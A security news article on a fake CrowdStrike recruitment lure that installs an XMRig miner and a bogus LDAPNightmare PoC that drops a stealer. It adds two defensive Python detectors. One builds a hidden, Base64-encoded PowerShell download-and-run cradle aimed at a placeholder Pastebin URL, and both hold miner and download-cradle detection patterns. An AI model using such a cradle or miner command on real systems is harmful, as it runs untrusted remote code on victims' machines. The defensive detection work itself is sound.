Cybersecurity firm CrowdStrike is warning of a phishing campaign using its own brand to distribute a cryptocurrency miner disguised as an employee CRM application as part of an alleged recruitment process.
“The attack begins with a phishing email that mimics CrowdStrike recruitment, directing recipients to a malicious website,” the company said in a statement. “Victims are encouraged to download and run a fake application that serves as a downloader for the XMRig cryptominer.”
The Texas-based company said it discovered the malicious campaign on January 7, 2025, and that it was “aware of the CrowdStrike fake employment scam.”
Phishing emails lure recipients by claiming that they have been shortlisted for the next stage of the recruitment process for a junior developer role and that they need to join a call with the recruitment team by downloading a customer relationship management (CRM) tool from the embedded link.
The downloaded binary, once launched, performs a series of checks to avoid detection and analysis before receiving the next stage’s payloads.
These checks include detecting the presence of a debugger and scanning the list of running processes for malware analysis or virtualization software. They also verify that the system has a certain minimum number of active processes and that the processor has at least two cores.
If the host satisfies all the criteria, the user is shown an installation failed error message while the XMRig miner is silently downloaded from GitHub and its corresponding configuration from another server (“93.115.172(.)41”) in the background.
“The malware then runs the XMRig miner using command-line arguments in the downloaded configuration text file,” CrowdStrike said, adding that the executable establishes persistence on the machine by writing a Windows batch script to the Start Menu’s Startup folder, which is responsible for launching the miner at logon.
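The persistence step above is one a defender can audit directly: anything in a Startup folder runs at every logon, so a batch script there that launches a binary with miner-style arguments is worth a closer look. The following is an added example, not CrowdStrike’s code or a sample from the campaign; it assumes the miner is started with the usual XMRig switches (a stratum pool URL via -o/--url, --donate-level, --coin, a wallet via -u), keys on the arguments rather than the file name because the binary is easily renamed, and uses constructed .bat contents for the demonstration.

```python
"""Added example (not CrowdStrike's code): flag batch scripts in a Windows
Startup folder that launch an XMRig-style miner.

Assumptions (not from the article): the miner is started with typical
XMRig flags (-o/--url pool:port, -u wallet, --donate-level, --coin, -a algo);
the sample .bat contents below are constructed for illustration only.
"""
import os
import re
import tempfile
from pathlib import Path

# Typical XMRig command-line switches. The binary can be renamed, so the
# arguments are a more stable indicator than the name "xmrig".
XMRIG_FLAGS = re.compile(
    r"(?:^|\s)(?:-o|--url)\s+\S+"            # pool URL
    r"|--donate-level\b|--coin\b"            # XMRig-specific options
    r"|(?:^|\s)-a\s+(?:rx|cn|gr|kawpow)\S*"  # algorithm families
    r"|(?:^|\s)-u\s+[0-9A-Za-z]{40,}",       # long wallet address
    re.IGNORECASE,
)
# A stratum URL is the clearest single indicator of a mining client.
STRATUM = re.compile(r"stratum\+(?:ssl|tcp)://\S+", re.IGNORECASE)


def classify_batch_script(text: str) -> dict:
    """Return the miner indicators found in a batch file's text."""
    hits = set()
    for line in text.splitlines():
        line = line.strip()
        if not line or line.lower().startswith(("rem ", "::")):
            continue  # batch comments
        if STRATUM.search(line):
            hits.add("stratum_pool_url")
        if XMRIG_FLAGS.search(line):
            hits.add("xmrig_style_arguments")
        if re.search(r"\bxmrig\b", line, re.IGNORECASE):
            hits.add("xmrig_name")
    return {"suspicious": bool(hits), "indicators": sorted(hits)}


def scan_startup_dir(startup_dir: str) -> list:
    """Classify every .bat/.cmd file in a Startup folder; return the suspicious ones."""
    findings = []
    for p in sorted(Path(startup_dir).glob("*")):
        if p.suffix.lower() not in (".bat", ".cmd"):
            continue
        result = classify_batch_script(p.read_text(errors="replace"))
        if result["suspicious"]:
            findings.append({"file": p.name, **result})
    return findings


def default_startup_dirs() -> list:
    """Per-user and all-users Startup folders (standard Windows locations)."""
    dirs = []
    if os.environ.get("APPDATA"):
        dirs.append(os.path.join(os.environ["APPDATA"],
                                 r"Microsoft\Windows\Start Menu\Programs\Startup"))
    if os.environ.get("PROGRAMDATA"):
        dirs.append(os.path.join(os.environ["PROGRAMDATA"],
                                 r"Microsoft\Windows\Start Menu\Programs\StartUp"))
    return dirs


# Constructed samples (not real artifacts from the campaign).
SAMPLE_MINER_BAT = (
    "@echo off\n"
    'start "" "%APPDATA%\\svc\\svchost.exe" -o stratum+tcp://pool.example.net:3333 '
    "-u WALLET_PLACEHOLDER --donate-level 1 --coin monero\n"
)
SAMPLE_BENIGN_BAT = (
    "@echo off\n"
    "rem Map the team share at logon\n"
    "net use S: \\\\fileserver\\share /persistent:no\n"
)


def demo() -> list:
    """Write the constructed samples to a temp folder and scan it."""
    d = tempfile.mkdtemp()
    Path(d, "updater.bat").write_text(SAMPLE_MINER_BAT)
    Path(d, "mapdrive.cmd").write_text(SAMPLE_BENIGN_BAT)
    return scan_startup_dir(d)


if __name__ == "__main__":
    for d in default_startup_dirs():   # real folders, only present on Windows
        for f in scan_startup_dir(d):
            print(d, f)
    print(demo())                      # constructed samples
```

Run on a Windows host it walks both real Startup folders; elsewhere it only scans the constructed samples. The regex list is deliberately narrow (pool URL, XMRig-only options, wallet-length argument) to keep logon scripts that legitimately map drives or start agents from being flagged.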
Fake LDAPNightmare PoC Targets Security Researchers
The development comes as Trend Micro revealed that a fake proof-of-concept (PoC) for a recently disclosed security flaw in Microsoft’s Windows Lightweight Directory Access Protocol (LDAP), CVE-2024-49113 (aka LDAPNightmare), is being used to lure security researchers into downloading information-stealing malware.
The malicious GitHub repository in question, github(.)com/YoonJae-rep/CVE-2024-49113 (since taken down), is said to be a fork of the original repository from SafeBreach Labs, which hosts a legitimate PoC.
However, the fake repository replaces the exploit’s files with a binary called “poc.exe” that, when run, drops a PowerShell script that creates a scheduled task to execute a Base64-encoded script. The decoded script then fetches another script from Pastebin.
The final-stage malware is a stealer that collects the machine’s public IP address, system metadata, process list, directory listings, network IP addresses, network adapters, and installed updates.
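The chain above leaves a concrete artifact to hunt for: a scheduled task whose action runs PowerShell with a Base64-encoded command that, once decoded, reaches out to a paste site. The following is an added example, not Trend Micro’s code or the script from the repository; it assumes the task action uses PowerShell’s standard -EncodedCommand switch (Base64 over UTF-16LE, with the usual abbreviated forms such as -e and -enc), and the sample command line it builds is constructed, with a placeholder Pastebin path rather than a real indicator.

```python
"""Added example (not Trend Micro's code): decode a scheduled-task action that
runs a Base64-encoded PowerShell command and report what it reaches for.

Assumptions (not from the article): the action uses powershell.exe's standard
-EncodedCommand switch (Base64 of UTF-16LE text; prefixes like -e/-enc are
accepted by PowerShell); the sample below is constructed and its Pastebin
path is a placeholder, not a real indicator.
"""
import base64
import re
from typing import Optional

# PowerShell accepts any unambiguous prefix of -EncodedCommand; longest first
# so "-enc" is not consumed as "-e" followed by junk.
_PREFIXES = sorted({"encodedcommand"[:i] for i in range(1, 15)} | {"ec"},
                   key=len, reverse=True)
ENC_SWITCH = re.compile(r"(?:^|\s)-(?:" + "|".join(_PREFIXES) + r")\s+([A-Za-z0-9+/=]+)",
                        re.IGNORECASE)
URL = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)
# Common download-and-run constructs in PowerShell one-liners.
DOWNLOAD_CRADLES = ("downloadstring", "downloadfile", "invoke-webrequest",
                    "iwr ", "invoke-expression", "iex")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if cmdline carries -EncodedCommand, else None."""
    m = ENC_SWITCH.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def analyze_task_action(cmdline: str) -> dict:
    """Decode (if needed) and extract URLs, paste-site hosts and download cradles."""
    decoded = decode_encoded_command(cmdline)
    script = decoded if decoded is not None else cmdline
    urls = URL.findall(script)
    low = script.lower()
    return {
        "encoded": decoded is not None,
        "decoded_script": decoded,
        "urls": urls,
        "paste_sites": sorted({u for u in urls if "pastebin.com" in u.lower()}),
        "download_cradle": any(c in low for c in DOWNLOAD_CRADLES),
    }


def encode_command(script: str) -> str:
    """Produce the -EncodedCommand form of a script (used to build the sample)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample: a task action that pulls a second stage from a paste site.
SAMPLE_SCRIPT = ("IEX (New-Object Net.WebClient)"
                 ".DownloadString('https://pastebin.com/raw/PLACEHOLDER')")
SAMPLE_TASK_ACTION = "powershell.exe -NoP -W Hidden -Enc " + encode_command(SAMPLE_SCRIPT)


def demo() -> dict:
    """Analyze the constructed sample action."""
    return analyze_task_action(SAMPLE_TASK_ACTION)


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

On a live host the command lines to feed in come from the task definitions themselves (the Command and Arguments of each task’s actions); any hit that is both encoded and carries a download cradle pointing at a paste site matches the pattern described above and deserves a look at the task’s creation time and the process that registered it.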
“Although the tactic of using PoC decoys as a means to deliver malware is not new, this attack remains a serious concern, especially because it exploits a trending issue that could potentially affect a larger number of victims,” said security researcher Sarah Pearl Kamling.